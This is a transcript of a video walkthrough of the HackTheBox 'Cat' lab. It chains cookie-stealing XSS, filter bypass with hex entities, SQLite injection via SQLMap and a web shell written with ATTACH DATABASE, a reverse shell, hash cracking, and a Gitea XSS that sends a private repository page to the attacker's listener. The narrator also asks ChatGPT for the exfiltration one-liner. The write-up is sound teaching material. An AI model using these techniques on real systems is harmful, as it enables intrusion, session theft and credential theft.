What's going on YouTube? This is Ipsec, and we're doing Cat from HackTheBox, which is a really great box for some cross-site scripting practice. It starts off with a custom web app that doesn't have HTTP only set on the cookies, and there's two ways we can trigger the cross-site scripting, either through a submission on a form, which has some filters we have to bypass, or if we sign up with an XSS payload and a username, we can bypass the filter altogether. This gets us an administrator cookie, which we can perform an SQLite injection. The website does have .git exposed, so we can pull the source code and then scan it with OpenGrep or Snyk to find that vulnerability, which we'll exploit with two ways. Once with SQLMap and the other manually by abusing the SQLite injection to write a web shell. Once on the box, we see an old version of git-t is running, which is vulnerable to cross-site scripting, but it's git-t, so the HTTP only cookie is set. So we can't just steal the session. We can, however, use cross-site request forgery to navigate to a project on git-t and send us the results of that page, leaking source code, which gets us the root credentials. So with that being said, let's just jump in. As always, we're going to start with an nmap. So -sc for default scripts, sv enumerate versions, -vv for double verbose. This gives us things like the TTL, OA output all formats, put in the nmap directory and call it cat, and then the IP address of 10.10.11.53. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and the banner tells us it's an Ubuntu server. The second port is HTTP on port 80, and the banner also tells us it's Ubuntu and redirecting us to cat.htb. So let's go ahead and add this to a host file, so sudo v etc host, and then we can add 10.10.11.53 cat.htb, save that. And let's go ahead and take a look at the page. So I'm going to go http cat.htb, and we get a page that just says, welcome to the best cat competition. We can click around. There is vote that says voting is currently disabled. If we click the buttons, it doesn't look like anything's happening. Going to contest, we can register. We can look at winners, and clicking join, it looks like we can register as well. So before we start going any deeper, I want to quickly just run a Go Buster, and we see it is a PHP server as there is a PHP extension. So I'm going to do a Go Buster, and then we'll do a -dir for directory mode, U for URL, HTTP, cat.htb, extension PHP, and wordlist. We'll do opt, seclist, discovery, web content, then raft small words text. And I would also probably run a virtual host enumeration as well after this is complete if we don't really have anything. The thing that sticks out right off the bat is config.php. That's a status 200, but size is 1, so we're not really getting any information out of there. But /uploads really sticks out to me. So I'm going to go ahead and take a look at the /uploads. So if we go to cat.htb/uploads, we just get a forbidden. I was hoping to be like an open directory listing, because if we upload it to the website, then we could easily find our file, right? So let's go ahead and register. I'm going to do ipsec, then root at ipsec.rocks, and the password I'll just do as password. We register. It says I'm successfully registered. I'll click have an account. Then we can do ipsec password to log in. And let's see, the first thing I want to look at is just my cookies on the page. It's just a standard PHP session ID. HTTP only is set to false, so it'd be really easy to steal cookies through cross-site scripting attacks, but we'll keep that in the back of our minds for now. So now let's go over to contest, and it looks like this is where we may be able to upload since there's a cat photo. So cat name, we'll just do test. I wish I could think of a good pun there. Cat age, cat birthday. It's kind of funny they're asking for age and birthday since they could just calculate that, right? Cat weight, whatever. We need to get a image here. So I'm just going to find an image on my box. So we'll do find, probably one out of user share will be there. Name star.jpg. Let's see, not named, name. There we go. Looking over, oh, we have a bunch of names already. I was going to say, let's go ahead and look at our results of GoBuster if this took its bit to run, but we've got it already. So let's copy the results here. There we go. We got image1.jpg. Awesome. And I am actually going to intercept this request just so I can see the data it sends. That will be handy later on potentially. Looking at it, it's just the web form, right? but if we wanted to manipulate this request, we now easily can. We uploaded image1.jpg, right? So what I want to do is see if we can go to uploads and then image1.jpg. And I think my intercept is still on. It is. We'll turn that off and not found. So it's not just giving the raw file name there. We have to figure out the naming convention if we want to attack that more. Let's go back to our GoBuster results. Do we have anything really of interesting? .git stands out. That is a 301. So if I go to cat.htb/.git, we get a forbidden. I'm going to run a tool called git-dumper. If you don't have it, you can just do like a pip-x install git-dumper, I believe. But if I run this, we'll do git-dumper, give it the URL, I think, and then the directory we want to save it to. I'm just going to call it source. And then it's going to download that .git directory and then copy it over here. So now we have the source code of this web application. So what I want to do is look at the upload code just to see if there's any vulnerabilities there, because it is a PHP application. Uploads is a big attack vector there. It's posting to contest.php. So let's take a look at contest.php. We can look at upload, and this is probably going to be where it's at. So let's see. We set the target directory, the file, and it's doing image identifier. So this is what we have to find out. What is image identifier? So if I do image ident, it is going to be unique ID. So I'm going to go over to PHP and Google unique ID. And we'll go over to this man page probably for this function and see how it generates. And it looks like we could easily brute force this, right? Because it's not random. It's the current time with microsecond precision. So we can easily guess the file name this way. But later on, it's doing a path info on extension. So this is going to grab the extension of the file. And I'm guessing this is going to be where the comparison is, right? So if we look at this, let's see, where is it going to use the path extension? There we go. So we have image file type only looking for these extensions. So code execution is blocked for us. There is a possibility that Apache or Nginx, whatever was running on the server, is horribly configured and would execute code with these extensions, but I haven't seen that in like a decade on servers. So I'm not going to test for that right away. If I get in a big roadblock, then I would go down this this path. The reason why I'm not going down it right now is because even though we can brute force that unique ID, it is not super trivial. It'll probably take 10 minutes probably to write up a script to do something like that. So I'm just going to put that on the back burner, right? We have all the source code here. We could do some code analysis things, but I'm going to save that for a little bit. The other thing we could test for is like cross-site scripting, right? And there's going to be two paths here. If we try to put cross-site scripting payload here, if we just, I'll do it in Burp Suite. This may be easier. So if we did like a script source is equal to, if I just do this, it'll probably error out for us, right? Send this request. Do we have anything? It says your entry contains invalid characters, right? So there is a check there. If I just grep the source code for this, we'll be able to see that's in contest.php still. So go back into this file. Your entry, there we go. So what it's doing is checking cat name, age, birth date, and weight for invalid characters, and it has this string, right? It's only checking those. If the page does have like username checking, like if the username is on the cross-site scripting page, then the check contains forbidden characters is probably not checking that. So that's going to be where I start. Let's see. Grep contains. I just want to see if that's used anywhere else. So I'm going to grep-r this. And no, it's only used on contest.php. We could look at the source to see exactly where it is. I'm not sure what page. It's probably on like accept cat or something like that. But I'm just going to create a new user now with some cross-site scripting to see if we get lucky, right? So I'm going to do join. And normally I would just do like a bold and then username and then look at it on the page to see if I see it anywhere, but the name isn't actually reflected back to us. So we can't do that really, but I'm going to do username is script source. Then we can do HTTP 10.10.14.8 port 8000. I'll call it pwn.js. And then we can do /script. I'm going to copy that to my clipboard. We'll do root2@ipsec.rocks and then password as password. And we'll see if it lets us register and log in. And we also should do a nc lvnp 8000. And then let's log in with this account. Password. There we go. And I'm going to send another request. Let's now upload, I guess, the same thing. Register cat. It's been submitted. And I'm going to see if we get any hits here. There we go. It is attempting to load pwn.js. So that is good for us. So what I want to do is we can keep that name, I guess. And we'll do make dir dub and then v pwn.js. We could also put this as our username, but might as well just do it here. We'll do a document.write, and we're going to write image source is equal to HTTP 10.10.14.8. And I'm going to actually use single quotes there. Port 8000. And let's see. Probably don't need a single quote. Okay, like this. And then I'm going to do plus. Is it document.cookie or document.cookies? I can never keep that straight. I think it's, let's see. If I go here, console, is it? I can probably just do document.cookie. It's just document.cookie. Awesome. I think this is all I need. Hopefully that works. Yeah, let's just stamp the server. So we'll do Python 3-m HTTP server. We have that now running. Let's do another upload. And we'll see if it gets triggered. Has been set for inspection. It got pwn.js, but it is not loading. Let's see. So we write, I wonder if I screwed something. Oh, I don't need that single quote there. Whoops. Okay. Let's test this. Image 1, register. Hopefully this time it works. Waiting for it to do another get. There we go. And now we have the PHP session. And it looks like it's sending us maybe a little bit more. I'm going to URL decode this. So we can just go to burp suites, decoder, smart decode, and that BR is not part of it, right? So if I copy this, we can now go into our storage, cookies, and set the PHP session to be this. Refresh the page. And now we're admin, right? If we wanted to, we can also exploit this a different way, right? So I'm going to show the other way, and this one's going to be the intended way to exploit it. So if we do ipsec, I probably already have an account, right? Or unless it wiped it. Let's test. Ipsec password. Okay, let's register an account. Ipsec root@ipsec.rocks. Password. Register successful. Ipsec password. So the intended way is actually to inject cross-site scripting bypassing the filter. So we'll do cat name test 1, and let's browse this. Image 1. we will intercept this request, send this over to repeater. Okay. So we won't be getting any more sessions because our username does not have that cross-site scripting payload. So how are we going to bypass this? Well, let's see. What is it? I'm trying to think the best way to explain it. I'm going to go back into the source and let's go into contest. And we'll look at the bad characters. So looking at this, some of the key things that aren't excluded is probably going to be these brackets. Additionally, it doesn't look like double quote is excluded. So what we can do is encode a request. So we'll be able to use HTML Entity Encoding in order to bypass any filters because let's just go cyber chef and show what HTML Entity Encoding looks like. Probably have to turn intercept off. Let's see. Just disable Foxy Proxy for now. Cyber Chef, GCHQ. I should really just put this on my bookmark bar. There we go. And once this loads, we should be able to put in the input IPsec and then encode HTML. Let's see. To HTML entity. And convert all characters. So this is going to be HTML entity encoding. And JavaScript will magically undo this, I believe. Let's see. Where is this being used? Let's see. Join, vote. It's probably going to be view, right? Because view cat is probably where everything is viewed, I guess. Let's see. This is where it's set. And right here, it looks like view cat is only available to the admin. Or wait, this is or. So username is set or session. Oh, so if there is a username set and it's not Axel, then it's going to redirect to join.php. Or not set. Okay. So if we go down here, let's see. This is going to be where it is echoed. So we have cat photo path, cat name, and whatever. So this is where I think we are injecting into the cross-site scripting. So we're injecting probably into image source with the photo path or cat name. So what we'll have to do is change this to be entity encoded. So let's see. So if we inject into the name, I'm going to put a double quote, and then I'm going to do on error is equal to, and then I can do JavaScript code here, right? I don't think I can load a external script source, so that's where we're just going to do the document.write, but this is going to be where we put it, and we should be able to just do it in entity encoding and have it work. So that's going to be what I try. And I haven't done this one actually yet. It's just a assumption. When I solved the box, I did it through the username and then saw this was the intended way, but haven't actually done it. So hopefully it all works live. What I'm going to do is copy this. We're going to grab it. Then I'm going to paste this in. And we want to close out the name. Then we're going to do on error is equal to. And I think we can do this. And wait, is the bad character? I think we can actually use double quotes. And I think we only want to encode this. Let's see. And I'm actually going to use fetch because we don't have to do a document write. We can just do fetch like this, HTTP. That should be fine. Okay. I think this is what we want. So I'm going to go to Burp Suite. We have it on repeater. This is going to be, I'm just going to send this. I want to make sure it doesn't send my cross-site scripting payload. I'm not exactly sure if what session this is. If this is my IPsec session or if this is the session that has the cross-site scripting itself. I'm not getting a request, so I think this is a good one to do it on. So the cat name, we're going to put a single quote on error is equal to paste in our payload. And let's see. If I don't have the trailing quote, I think it's going to put that for me. So this should work. I'm not getting a hit back, so this is definitely the right name. I'm going to send it. And hopefully we get a hit in a second. I wonder if I can view, if I try to view cat, I probably don't know the ID I need to get, right? Let's see, that does not look like it hit. Does this say invalid characters? It does. So you probably have to encode more, right? Auto scroll. What are the invalid? CD source, the contest. Okay, what one did we use? We're not using a, oh, that's any. So plus. There is no plus. We're using double quotes. That is not on here. Oh, we have a semicolon. Semicolon's a bad character. I guess we have to strip those out or something. So let's see what happens if we just remove semicolons, because I don't think that is needed for it. So we can do replace, go here, semicolon with nothing. Match all. Oh, I have a quote. I don't know why I did that. Let's try this payload. Paste this. There's no more invalid hit. And I am still listening. So hopefully we get a hit back in a couple seconds. But it doesn't look like it. So we have something else wrong. Looking at the payload, we're doing test. Oh, I think I see it. We're doing double quotes inside of fetch. And we also have double quotes here. I'm guessing that's what's breaking it. So I'm going to change this to be single quotes. And now let's send this. So we can change this payload now. Whoops, don't want to do everything. Send it. Don't have invalid still. Looking here. Hopefully we get a hit. Doesn't look like it. We can try changing to be hex entities. Maybe named entities requires the semicolon and hex would not, because hex is always going to be 2 characters. This is also a possibility. So we can paste this one, send that. Still not getting any errors, but we're not getting a hit. Let's see. Wonder if I need to put a quote there. And then we can do this. I can't imagine this fixing it because all the page is going to do is do a double quote and space. Oh, we got a hit. We didn't even send this one. So I just was not patient enough. So this payload worked. We have to do it in hex encoding, probably because we removed the semicolons. And there's probably like a regular expression there for like when it's decoding, it does the ampersand, pound sign, X, and then 2 characters. And when it's coded as named entities, it doesn't easily have that ability because we have like 2 characters there, some string here. So it uses that semicolon probably to as a terminator, right? So that's probably what fixed it, is changing it to hex. And then the page adds that parenthesis and goes on. But that was the other way to do the cross-site scripting, much harder than just putting it in with the username because you have to bypass it. And then you also have to trigger it within that HTML. But there we go. We have now done the cross-site scripting 2 different ways. So let's go ahead, put this as our cookie, and then we can just refresh, and we got admin. Now, this piece is a bit harder to find. If we had loaded up this code in Snyk, it would automatically find. I'm going to see if I'm logged in. Hopefully I am. And either way, I'm going to show a different tool in case you don't want to use like cloud AI stuff for processing data. I'm assuming Snyk is pretty much using this on the back end. Yes, I trust the authors. Please say I'm logged in. Yes, it is looking like it's running. Okay, sweet. When it said connect workspace, I got a little bit worried. But it's looking at the code for vulnerabilities. Hopefully, there we go. Finds them pretty quickly. We have a SQL injection inside of accept cat. We don't need that. Don't need that. And here, we can see the vulnerability, right? It's doing exec. Right here, we have cat name just being straight in the parameter. The correct way to do it would be using a prepared statement. And they do that here with the delete from. See, we can see in the actual SQL, they do a colon cat ID, and then they're calling bind parameter, looking for that variable, and then inputting it right here, right? So this is the correct way to do it because you won't be able to use any escapes to do SQL injection, but here they're not doing that, right? So they just hand jam the straight post data into it. Now, if you didn't want to use Snyk, there is a tool called OpenGrep, which is a fork of SemGrep. It's a long, complicated story, I think. Essentially, SemGrep is going more commercial now because people keep using its code for profit because the licensing did not prohibit that. So they're locking some features away behind a paywall, so it got essentially forked into OpenGrep, which is the more free version. So that's going to be the one I show. I already ran the install with this command on my box. And the other thing we need is OpenGrep rules in order to have this work. So I'm just going to grab all the rules here. So what I'm going to do is a git clone OpenGrep rules. There we go. So I can run OpenGrep scan -f and then my rules. So if I look at the OpenGrep rules, we can see what they have. I'm going to use the PHP rule set. So we can do, let's see, OpenGrep rules, PHP. And then I'm going to specify the source directory to scan. And it should automatically load these rules and then give me some output, right? Here we go. So it looks like it found 4 code findings. Let's compare to what Snyk found. It has 5 issues. So we have SQL injection, information exposure on config.php, path traversal on delete, and then 2 use of password hashes. That's going to be MD5 on join. So let's see. We have the SQL injection, so it caught that. We have the, I'm guessing this is the path traversal. User input detected when unlink. So we have the path traversal right there. Weak crypto on join.php, so it's found that MD5 as well. I thought it said 4. I see 3 findings. Huh. Maybe there's a flag I can do to show the 4th one. I don't know. That's weird. But the key thing is finding the SQL injection. And there's going to be 2 ways we can exploit this. The first is going to be the more common way, which is just SQLMap. So let's see, that was on except cat, right? And let's see, we want except cat. We make sure we're the Axel user. And the vulnerable parameter is cat name, right? So let's go ahead and trigger this. So if we go admin, hopefully it shows up here. Let's just create another cat real quick. Submit, admin, there we go. We got accept. I'm going to turn my intercept back on. Let's see. Proxy, intercept on. Accept. Yes, I want to. And we have the request here. So I'm going to, let's see, copy the file, HTTP, do it here, HTTP, not critical ops, cat, and I'll call this accept.request. And let's see, I want to see what database this is using. That's probably going to be in, I guess, config. DB file cat.db, SQLite. So we know there's going to be SQLite. We don't have to know this. It's just going to make it go a lot faster, right? So we'll do SQLMap. I think it's lowercase r for its request file. Accept.request. Parameter was cat name, I want to say. DBMS, SQLite. Run this, and we'll see if it finds it. Let's see. Looks like it did. So we can do level 5 risk 3. Oh, it found it. I actually think it found it so quickly because it's already cached. So let me clear this real quick. So go in here. I'm just going to delete this. There is a query in SQLMap to make sure it's fresh queries. Let's see. I probably should have done like batch mode. So it doesn't look like it finds it this way. We have to do level 5 risk 3. And I probably should have turned batch mode on there. But this time, hopefully it finds it. It thinks it might not be injectable. It's doing more queries. We're doing time-based blind. I guess, let's see, checking if it's false. It is vulnerable. Do I want to keep testing others? Nope. So there we go. We have found it. So I'm just going to run the --dump and see if we start getting data. It looks like we are. So here we go. It is now starting to dump all the data out of the database. There is a second way we can kind of exploit this injection. Let's see, SQLite RCE. I'm going to see if I can find the cheat sheet quickly. It's probably under like payload all the things. Let's see, payload all the things, SQLite. Maybe this will find it faster. Disable burp suite. Payload all the things. Did not go to the SQLite directory, unfortunately. Let's see. SQL. No SQL injection. Let's see. Inject. There we go. Does this go into things? No SQL. SQLite injections. Okay. So remote code execution, attach database. This is essentially what we want to do. We attach the database. which creates a file. So it's going to create lol.php as a database file. Then we create the table, and then we can insert data into this table. So this is going to be what we want to do. So I'm going to go back to my except cat. I'm going to put cat name at the end just so it's easier to read. So we can delete that. Here we go. So let's go look at the code again, because that dump command is going to take a while. I just wanted to show how it works. So view cat, and let's see. Where is it? Cat name. Oh, it's not view cat, it's accept cat. There we go. So the query, it is using a single quote and a parenthesis. So we'll do single quote, parenthesis, and then we'll do a semicolon. And now we can just pretty much have this. And this is only going to work if the web user has write access to a file, right? So if I just run this now, let's see what happens. Access is denied. Let's see. Actually did not expect that. Templol, access denied. Is my cookie bad? Let's see. Forbidden. Let us disable. I am no longer admin. So I think something happened to my cookie, which is annoying. So I guess we should get another one. And that's probably why my SQLMap started erroring. I'm guessing one of the cleanup scripts updated a cookie and expired the old one, which unfortunately means we have to grab another cookie. Yep, let's do ipsec, root at ipsec.rocks, password, ipsec, password, log in. Let's grab a cookie here, session ID. This payload worked. We can paste that. We'll VNP 8000. Send this. Should get us a new cookie, hopefully. Give it like 10 seconds. It should work. Let's see. It's not saying invalid. We shouldn't have that quote at the end of that, though, I don't think. Because it adds the quote for us. Come on. And there we go. We have it. So let's copy this cookie now. And then we will paste this here. Rerun this. And there we go. We have a 500 internal server error. And that's probably because this directory is not writable or it doesn't exist, right? If we try writing to where we probably have access, like dev shm, we have the cat has been accepted. So this is a good way to identify if we can write there, right? So I'm going to do var dub HTML, and it doesn't look like we can write there. We could do HTML slash uploads because that's where we're writing to. So we know that is writable, and we still can't. So I'm guessing the document root is probably not var dub or var dub HTML. Another one that's common is going to be just the domain name. So you could do cat, not writable, cat.htb. And there we go. We have successfully written to var dub cat.htb uploads lol.php. So now if we try going to it, and if you're confused, this is super common with virtual host. Normally, like it's virtual host under dub for the thing. Sometimes it doesn't have the domain extension. Sometimes it does. The key thing is enumerating a way to find out if you can write versus can't write. Then you can now just play the guessing game. So let's go ahead and try writing here. I'm going to turn Burp Suite off. We can now go to uploads lol.php, and we have the SQLite database. Now, the parameter we wrote is saying, get system CMD. So if I do CMD is equal to ID, we can now see we have the ID here. I'm going to change this because I like doing it in the post request. So I'm just going to do request, and then I'm going to create parent.php because I don't know if we can overwrite the file. So that's why I'm just going to give it a second one. And now I can put my command in either the get portion or post portion. So I'm going to go back to proxy, turn intercept. I should have left it on. My bad. Go to burp suite, on, send, go to repeater. And I'm going to change request method. So now it's in this, which just means there's less bad characters we have to worry about. So we can now send a reverse shell, 0 and 1 like that. Highlight this, Control U to URL encode, nclvnp 9001, send, catch the shell, Python 3, import pty spawn. And what I'm doing here is just getting a better terminal where I can do clearing screen, tab autocompletes, things like that, right? So we do raw echo, foreground, enter, enter, and then export term is equal to x term. There we go. Now I can clear the screen and everything, and we have a shell on the box. And whenever I parent a web server, I always like looking for the database to get hashes and try to crack them. So if we do ALS, I'm looking for that SQLite database. Let's do find.-name *db. It's not there. That was in config. So it looks like it's in /databases. Okay. So you can do SQLite 3 /databases cat.db. We could just run .dump and get them, but I like doing .schema. And we can say select username, password from users. And here we go. And Snyk was telling us this was MD5 encrypted or MD5 hashed. We could validate that, but I don't think we have to. So we just send this. If we cat it, we could just like word count. If this is 32 characters, chances are it's MD5, right? So let's see. Since they're not salted, what I'm going to do is just send them to crackstation and see what cracks. So we'll do awk-f on that, print 2. There we go. Now we just have a list of all the hashes. Is that really one? That is odd that it's short. Echo-n, WCC. That's bizarre. I'm guessing they were all hand jammed in. I don't know why that hash is 2 characters shorter. Let's see, crackstation. I don't know if it's com or net. Burp suite is still on. There we go. It looks like it is .net. So we can send up to 20 hashes. I don't think we have 20 there. Let's see, motorcycles. There we go. And we have 2 hits. Password, which this is my password. Remember, we registered for that. And then we have AC3. So I'm going to grep for this on users.txt. And we have that password as rosas. So if we cat etsy pass wd, let's grab everything that ends in sh. Just do it this way. We have users, root, Axel, Rosa, Git, and Jobert. So we have Rosa's password. If we now try SSH, Rosa at cat.hdb, let's copy this password, paste it in. vcreds.txt. Let's just save this. There we go. We get in. And if we SSH into the box, never mind. We are Rosa. And if we look at the groups, we're a member of ADM. And there was something I missed when we were looking through the application, right? If we go all the way back, let's register a new account here. Not found. Whoops. If we're looking at how the application works, if I go to join, come on, let's just say we have an account. Probably don't anymore, but that is not key, right? If I now intercept, we look at this request, we are passing credentials over the get parameter, and the get parameter is logged, right? So this should all be in a post request, because if they're in gets, all the credentials go to logs, and since we're a member of the ADM group, we can definitely read logs. So if we go in var log, and then Apache 2, then we can cat access.log. Let's just do a grep, was it join.php? There we go. Less s. Let's see. We can see username Axel and login password, and we get this string. So we can do a su, switch to the Axel user with this password, and we log right in. Now, there is something I want to mention. If we su to the user, you see we don't get any welcome banner. If I ssh as Axel at cat.htb, we get the login banner, and it also tells us we have mail. And this is going to be somewhat key. So if we cat var mail Axel, we can read the message that talks about get t. And it's kind of critical because this is telling us that someone is going to check their mail on the box and navigate to Git repos at a URL, right? So what I want to do is set up a tunnel. So I'm going to do -l 3000 127.0.0.1 3000. And I'm just doing that because it told us get t was running at this port. We could have also just done like an SSLNTP, saw 3000 and decided we want to look into it. Let's see, --forest. Looks like we can't see processes from other users, but I bet if I go to Etsy grep-r3000, we're going to see get t here. MIME types, moduli, does not look like it. But since I did my port forward, now I can go to localhost 3000. We'll turn burp suite off. There we go. And we get to the get t. And it tells us the version down here. So if we Google get t, this exploit, we'll probably find things right off the bat. Stored cross-site scripting. Let's see. Do we have like a proof of concept? Understanding. Okay. So what it is we put this. Does it say description anywhere? Yeah. We put that payload in the repository description. So we have to first log in. And I'm going to try Axel. And let's grab that password. I probably should put this in creds.txt. So we'll show how the vulnerability works, and then we will exploit it. Or we'll send it to the user, right? I'm going to call the repository pwn, and then it wants us to put something in the payload. And this is the same thing from the repository, but we can see login, create a new repository. In the description, put this under the thing. New repository, we'll put that description, create. And we don't have any hits. And where this actually exploits is if they click the description of this XSS test. So if I went to the repository by clicking the description, boom, we have that alert. And all that's doing, if you can see in the bottom left of my screen, I know it's small, it's just putting JavaScript :alert there. So that is going to be where we have to inject the code. So let's see what we have to do. And we're going to steal the cookie, and it's going to be, well, we're not going to steal the cookie because this is get t. I misspoke, right? If we go here, look at the cookies. We see HTTP only is set to true. The mail kind of told us the location of one repository. Let's do cat var mail Axel. So we have this repository. So what we want to do is control the victim's browser, navigate to this repository, and send it back to us. So I'm going to go to ChatGPT real quick. Let's turn Burp Suite off. And then ask it if it can give me a one-liner. So let's see. Can you give me a JavaScript one-liner that will navigate to a page and then send the result back to me via a post? There we go. So we have a one-liner of a cross-site scripting thing we can send. So I'm going to copy this, and then I just want to go to git-t, and I'm going to play with this in my browser. So let's see, v.pwn.js. Let's paste this, and what we want to do is fetch this page. So I'm just going to fetch localhost Axel, and then I'm going to send the results to me. So we'll do HTTP, and we'll just do 10, 10, 14, 8, 8,000. And we'll do method post. That should be fine. I don't know if we have to send it as JSON. We'll try this. That's the downside with using AI. Sometimes it goes overcomplicated. But let's see what happens if I send it. Promise pending. Because it is sending. It's doing it options though. And this is part of cores. So we want to disable cores in the payload so it doesn't test which endpoints are available. I could just ask ChatGPT, how do I disable cores? But it is here in fetch. We can just do mode, then no cores. And that should stop that. So now let's go ahead and copy this. Send. Listen again. There we go. We have the payload. I just wish it wasn't in JavaScript or JSON. Let's see. Can I quickly fix that? So let's see. We can get rid of headers. And then, let's see, how do we do this? We just need body, probably just body text, right? Like that? Maybe. Capone. Having it not be JSON is just going to make it a bit easier for me to open it up in Firefox. It stops me from having to decode the JSON. We have an error. Missing after argument. Let's see. Can you send this as raw, not JSON, and disable cores on the post? Let's see. Okay. Hopefully this is fine. Method post. It didn't disable cores. Localhost 3000. Axel. We have to get rid of HTTPS. And this. Was just 10, 10, 14, 8. 1000. Mode. No cores. Oh, I guess I had a extra parenthesis here. So I think that's what I wanted, but this should work. So cat pwn. Hopefully now this works. And then we can send it off. 8000. Where is my git-t? Pending. There we go. Now we just have the page. That's better. So vpwn. What we want to do is grab this page. So we'll copy this. And we will replace this with that page. Okay. Here's our good one-liner. And we want to start netcat. We'll refresh because I think this repository is actually gone now. Yep. So we have to create it. So we can do, we'll call it pwn still. And then the description. Let's see. We want to copy this. And then we need to terminate it. I hope I have this payload correct. That's probably fine. I am going to save this just so we have everything. Okay. Let's create repository. And then we also have to create a file. If we don't, the XSS bot won't work. So that is a bit annoying, but you can't give it a empty repository. So now we just want to send, I think it's Gerbert that said it. So let's see. Let's be sure to clear description. Yep, mail to Gerbert at localhost. So let's do echo this, and we can send mail to Gerbert at localhost. And hopefully they will take a look at my repository. And when they do, if they click the description, they will get a hit. And it looks like it got cleaned up. That is annoying. Let's go ahead and do this one last time. Pwn. Let's see. Grab this. Take this payload. Copy. Paste. Create. Give it a new file. Does not matter what the file is called, just has to be there. Okay. Go back here. Send it. And hopefully we get a hit. If not, I will click this link and see. We definitely probably won't. Just because this looks like bad JavaScript. If I click it, nothing is happening because this definitely does not look right. vpwn.js. Let's see. I'm going to put this in quotes like that. Maybe that's going to be better because the link should just say XSS test. Go to this repository. We can do settings, change the description, update. That looks better. Let's send that mail again. And then give it, we'll give it 15 seconds. So when this finishes, if we don't get a hit, I will go in and click this link. Let's just make sure it is still there. It is. Oh, there we go. We got a hit. Let's make sure that hit is the server and not me refreshing. Even though I didn't click the link, I'm pretty positive it's going to be the server. Oh man, this is big. Well, let's see, NCL. There we go. See, connection from, yep, this is going to be the server. So what I'm going to do is, whoops, I want to copy everything. So I'm going to go here. Nope. One more over. Mark it. Go all the way down. vpage.html. Paste that. Firefox page.html. And this should be a little bit easier to view. I guess all the images are broken, but we can see files in this repository. So we have index.php, and that's what I want to grab. So let's see, does this file still exist? It does, awesome. If I go to raw, so it's raw branch main, and that's gonna be the file we wanna grab. So let's go back into pwn.js. I'm gonna go administrator, employee management, and now we're going to specify raw branch main, and then index.php. There we go. Cat pwn. Let's go ahead and grab this payload. NCLVMP 8000. See, let's go pwn or settings. Here it is. Description. So now we're going to try to leak the index.php file. Let's go ahead and send this. And then again, we'll give it 20 seconds and hopefully we get the response back. And then when we do, we'll see the contents of index.php and our netcat, and we'll see what this application is, right? And while that goes, let's see, were there anything else here? Maybe dashboard. I don't see any config. We may also want to grab the README. That's another one we could. Still don't see it. I wonder, let's just make sure this repository still exists. It does not. That cleanup script is really annoying. Pwn, cat pwn.js. Grab this, paste, create repository, new file, commit, send. Okay. For real this time, should work. So give it 20 seconds. I'm going to pause the video. And there we go. It did not even take 20 seconds. You can see my terminal is still sleeping. But if we look, we have admin and then a password. And where is this authenticating to? Employee management. But if I just go back to SSH and we try to SU, that password worked for root. And there we go. We can get root.txt. So that's going to be the box. Hope you guys liked it. Take care, and I'll see you all next time.